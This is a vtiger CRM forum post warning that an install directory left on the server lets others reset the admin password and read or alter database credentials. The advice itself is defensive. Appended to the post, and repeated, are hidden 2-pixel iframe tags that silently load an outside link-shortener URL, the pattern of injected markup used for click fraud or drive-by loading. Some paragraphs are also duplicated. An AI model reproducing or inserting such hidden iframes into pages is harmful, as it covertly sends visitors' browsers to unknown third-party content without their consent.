Howdy, Stranger!
It looks like you're new here. If you want to get involved, click one of these buttons!
Categories
- 17.5K All Categories
- 43 Vtiger CRM 8.1.0
- 61 Vtiger CRM 8.0.0
- 129 Vtiger CRM 7.5.0
- 7.9K Vtiger CRM 7.4.0
- 309 Vtiger CRM 7.3.0
- 695 Vtiger CRM 7.2.0
- 1.7K Vtiger CRM 7.1.0
- 1.3K Vtiger CRM 7.0.0
- 2.2K Vtiger 6.x
- 1.7K Vtiger CRM 6.5.0
- 1.5K Vtiger CRM 6.4.0
- 304 Vtiger CRM 6.3.0
- 1.7K Vtiger CRM 6.2.0
- 1.4K Vtiger CRM 6.1.0
- 3.1K vtiger CRM 6.0.0
- 638 Help - 6.0
- 171 Feature Requests - 6.0
- 231 Extensions - 6.0
- 411 Usability - 6.0
- 1.3K vtiger CRM - Mobile Apps
- 233 Help
- 35.7K Archives
- 1.6K vtiger CRM 5.4.0
- 1.4K vtiger CRM 5.3.0
- 5.8K vtiger CRM 5.1.0
- 3.8K vtiger CRM 5.0.4
- 2.3K vtiger CRM 5.0.3
- 9.4K vtiger CRM 5.0.2
- 5.3K vtiger CRM 4.x
- 2.5K vtiger CRM - Extensions
- 4.6K Announcements & Discussions
- 28 Test Forum
- 252 Blogs
vtiger Security Risk
I was installing the latest branch build from svn and thought of a possible security risk in vtiger. I want to make sure everyone is aware of the risk and takes appropriate action (if necessary). The risk involves not removing the install directory after installing vtiger. Though this is a best practice for anyone familiar with web security, I fear that some vtiger users may not remove this directory. It is not mentioned in any of the install documents to remove it.
If the install directory stays on the server after installation, an informed individual could change the admin password without any trouble at all, they could also view the mysql database and username information. With the current changes in the branch, they could also change the SQL database (readonly tags removed). If the files in the install directory are removed after installation is complete, this risk will not exist.
I am working with the branch team to implement an automated solution into the installation for the next release. For any existing installs, please ensure you remove the install directory in the root of the vtiger installation directory. Not doing so puts your implementation at serious risk.
Moderators, please make this post sticky. Thanks. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
If the install directory stays on the server after installation, an informed individual could change the admin password without any trouble at all, they could also view the mysql database and username information. With the current changes in the branch, they could also change the SQL database (readonly tags removed). If the files in the install directory are removed after installation is complete, this risk will not exist.
I am working with the branch team to implement an automated solution into the installation for the next release. For any existing installs, please ensure you remove the install directory in the root of the vtiger installation directory. Not doing so puts your implementation at serious risk.
Moderators, please make this post sticky. Thanks. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
regards, remco